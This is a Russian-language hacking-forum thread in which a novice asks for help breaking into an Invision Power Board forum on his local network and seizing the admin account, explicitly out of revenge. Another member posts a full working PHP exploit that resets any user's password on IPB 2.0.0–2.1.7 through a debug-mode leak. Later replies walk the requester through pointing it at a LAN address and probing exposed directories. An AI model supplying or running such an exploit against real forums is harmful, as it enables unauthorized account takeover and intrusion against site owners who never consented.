12.11.2007, 13:01
|
|
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами:
9737661
Репутация:
5
|
|
Атака на Ipb + сниффер
Здравствуйте!
У меня парочка вопросов...
1. Подскажите сниффер для локалки чтобы взломать IPB!?
2. Есть простой способ взлома IPB?
Я не очень соображаю в хакерстве тут...но хочеться поломать форум или же узнать login и password админа в IPB !
|
|
|
12.11.2007, 13:12
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами:
9798146
Репутация:
1224
|
|
хотя бы версию сказал
|
|
|
|
12.11.2007, 13:15
|
|
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами:
9737661
Репутация:
5
|
|
Сообщение от it's my
хотя бы версию сказал
Русская версия Invision Power Board v2.1.7 © 2007 IPS, Inc. 
И последнию! Но главно взломать ту которую выше указал...помогите народ пожалуйста я в этом деле воще мало что знаю...но отомстить я хочу!
|
|
|
|
12.11.2007, 13:20
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами:
9798146
Репутация:
1224
|
|
может поможет
PHP код:
<?php
/*
Debug Mode password change vulnerability
Affects Invision Power Borard 2.0.0 to 2.1.7
by Rapigator
This works if:
"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on
In General Configuration of the forum software.
*/
// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";
// An existing user's login name
$name = "admin";
// The new password(3-32 characters)
$pass = "1234";
// You can use a proxy...
// $proxy = "1.2.3.4:8080";
// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "&debug=1";
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode)) {
echo "Error: Probably not vulnerable, or no forum found";
exit;
}
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}®id={$regid}®_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
function change_pass($regcode,$regid,$vid,$userid) {
global $site, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}®id={$regid}®_code={$regcode}&pass1={$pass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
# milw0rm.com [2006-11-01]
|
|
|
|
12.11.2007, 13:28
|
|
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами:
9737661
Репутация:
5
|
|
хм...как я понял это php файл создать и это туда сунуть? Если так т оя сделал поставил VertrigoServ создал php файл твой код вставил запустил пишет "Error: Probably not vulnerable, or no forum found" что там чтонить менять надо в php в коде или тупо вставить?
(извени за тупость если что не так...спасибо что помогаеш)
|
|
|
|
12.11.2007, 13:48
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Как ты понимаеш варианта два:
либо ты не правильно указываешь адрес форума(он у тебя в локалке стоит, а есть ли у вас Dns сервак, если нету надо указать апи форума и путь), либо форум не "болеет" этим багом, что скорее всего, или не выполнется такое условие на серваке:
This works if:
"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on
Менять там нужно только прокси, он по дефолту выключен.
Последний раз редактировалось AkyHa_MaTaTa; 12.11.2007 в 13:51..
|
|
|
|
12.11.2007, 14:12
|
|
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами:
9737661
Репутация:
5
|
|
нету там dns там из ip типо http://192.168.4.24/forum что мне делать?
|
|
|
|
12.11.2007, 14:58
|
|
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами:
9737661
Репутация:
5
|
|
Акуна матата: Я без понятия....
it's my: Попробывал пишет: Error: Probably not vulnerable, or no forum found
Почитал то что ты сказал там сразу написал http://192.168.2.24/forum//ips_kernel/PEAR/ открылась типо ftp ну вот:
Index of /forum//ips_kernel/PEAR Name Last modified Size Description
Parent Directory -
Text/ 01-Nov-2007 22:49 -
lgpl.txt 18-Jul-2006 18:56 26K
Apache/2.2.4 (Win32) PHP/5.2.1 Server at 192.168.2.24 Port 80
Папка: Text,lgpl.txt - тут:::
GNU LESSER GENERAL PUBLIC LICENSE
Version 2.1, February 1999
Copyright (C) 1991, 1999 Free Software Foundation, Inc. ну и т.д
в папке text файлы: Diff.php,Diff3.php,lgpl.txt,package.xml там ещё папка Diff в ней Renderer.php и папка Renderer а в ней inline.php и unified.php
т.е. в папки какието могу заходить...это и есть уязвимость? что мне делать подскажи...
Последний раз редактировалось tick; 12.11.2007 в 15:03..
|
|
|
|
13.11.2007, 07:01
|
|
Познающий
Регистрация: 13.07.2006
Сообщений: 65
С нами:
10436457
Репутация:
11
|
|
Сообщение от tick
Акуна матата: Я без понятия....
it's my: Попробывал пишет: Error: Probably not vulnerable, or no forum found
Почитал то что ты сказал там сразу написал http://192.168.2.24/forum//ips_kernel/PEAR/ открылась типо ftp ну вот:
Index of /forum//ips_kernel/PEAR
Хотя толку нет но всё равно попробуй в сплойте писать не
http://192.168.2.24/forum /
а без ключа в конце
http://192.168.2.24/forum
|
|
|
|
12.11.2007, 14:22
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами:
9798146
Репутация:
1224
|
|
а форум из инета виден:
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
